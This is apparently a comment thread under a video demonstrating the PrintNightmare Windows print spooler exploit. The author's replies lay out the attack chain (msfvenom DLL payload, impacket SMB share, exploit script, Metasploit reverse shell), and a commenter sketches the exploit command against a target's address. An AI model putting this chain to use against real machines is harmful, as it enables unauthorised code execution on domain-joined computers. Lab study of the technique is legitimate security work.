Vulnerability that Rocked the World "PrintNightmare" .... You Did It great !!!
I still don't understand this. Does PrintNightmare only happen to shared printers (e.g. USB) but not to printers on a switch? Since PrintNightmare, all the patches we had installed didn't allow us to access our shared printer (connected to main PC with USB). The main PC is connected to a big LAN. Now we bought a nice 8-port switch and connected lots of devices to it and the best part now: every PC can access the printer now perfectly.
In the beginning, using the shared printer was only possible by downloading the driver from the main PC. Since the printer is connected to the switch, the driver has to be downloaded from the HP website.
Nice buddy. You did great ! 🤟
Hmm the final command to run the exploit seems to give me a connection failed error code. Any idea on how to solve it?
Nice effort.. dude. Keep going!
Thank you!
Hey there...
Was revising this..
Hi there...
Unable to figure out the need for this share drive that we set on the kali...
We used msfvenom to create the payload..
Metasploit for listening for the connection...
Now our aim is to execute this payload on the remote workstation that has the print spooler service enabled...
Why did we need the help of a share drive in our attacker workstation and use impacket to use the victim to execute that DLL file via the share hosted on our machine ...if we had somehow managed to deliver that payload to the victim, I guess the share drive n impacket step is not needed...
Please enlighten me
We need the SMB share. So what we do is generate a malicious DLL using msfvenom, and then use the custom version of impacket used in the video. We need the SMBServer.py as it is going to host our malicious DLL. The exploit will get the malicious DLL on the system by the SMB share which we hosted. Once it is on the system, the DLL will be injected into the memory. And all of this is happening due to the vulnerability: PrintSpooler had an authentication bug in it, due to which anyone could install print drivers. As an attacker, we can take advantage of it and put a malicious DLL on the target system.
@@ActiveXSploit thanks man..
So I understand this...
- msfvenom: payload creation
- impacket smbshare: create a share drive on local machine to host the malicious dll.
- impacket cve module: to force the Victim to execute the DLL which becomes possible due to auth bypass bug.
- metasploit: get a reverse shell once the dll is executed
@@ian230187 We are using impacket to set up an SMB share. impacket is the name of the scripts, don't get confused by it. There is an impacket script called smbserver which we used to set up an SMB share which is going to serve our malicious DLL. The one which delivers the DLL over there and executes it is the exploit.
@@ActiveXSploit ohh ya..my typo...
Impacket modules of smbshare and the cve..
Thanks
Just a quick query....this exploit can be used to target normal workstations as well and not necessarily domain controllers...It's just that the machine needs to be part of the domain...Am I right?
Yes, you are right. This is an AD based attack; the machine should be a part of the domain.
@@ActiveXSploit thanks man ..n great job... One request ...at the end of video...if you could quickly add a slide about the steps n a one liner explanation about the command significance it would be super awesome
@@ian230187 Glad you liked it! Alright! I'm gonna keep that in mind!
This is the best video ever
Hello there, it's a great video and explains everything in great detail. I'm quite new to using Metasploit or not really I just can't wrap my head around it. So when I connect to the Windows machine how do I actually navigate it, can I just use normal Windows commands? So if I would for example want to just make a new file I would just type into the msfconsole "md %random%" for example if I wanted to make a random empty file?
You can switch to the shell mode by typing the command 'shell' when you get a meterpreter connection, and you can just run standard Windows commands such as cd, mkdir, rmdir, and so on. But you can also do this in a meterpreter session, just type out help to list out available commands in a meterpreter session.
@@ActiveXSploit alright thank you very much! You've been so helpful and make great videos
@@Hatarpotatissmaskare Glad to hear that! There are good videos on usage of metasploit on UA-cam, just search them up and you should get some good resources!
@@ActiveXSploit yes thank you I'll go see. I've checked out some videos before but all I've really found is basics and how to create a reverse tcp shell. Otherwise it doesn't really go in depth about metasploit. Found one which is very good tho
@@ActiveXSploit I just can't seem to get it to work so at the end to establish the connection you do python3 ./CVE-2021-1675.py then what is it I put here/username:"password"@ip address of target machine '\\my ip address\share\shell.dll'
Did I get all that correct? Except for my question on what to put before the username
GREAT!!!!
Do you know how to use SMBv2 instead of v3 when setting up the server with impacket? Thanks!
Please add the -smb2support flag
I have tried the same but at the last stage what name, password and IP should be used? Because of this, I am stuck here and unable to proceed further
Hi, did you manage to solve this? I'm also trying this out but stuck here😢
Hi did you manage to solve this? I am trying this out and stuck here too😢
Great
better to make a venv to have the custom impacket
Nice video. Tried that but defender is a bitch.
Haha, Defender is getting better every day!
Noice
Give me the link to Windows 2016 vuln, sir!
Do check description of the video please.
Can you give me the link for how to download vulnerable Windows 2016?
@@sarunkim6096 What do you mean? Vulnerable version of Windows Server 2016?
Yes, I want to test it.
@@ActiveXSploit I have downloaded Windows 2016 from Microsoft but it is not vulnerable.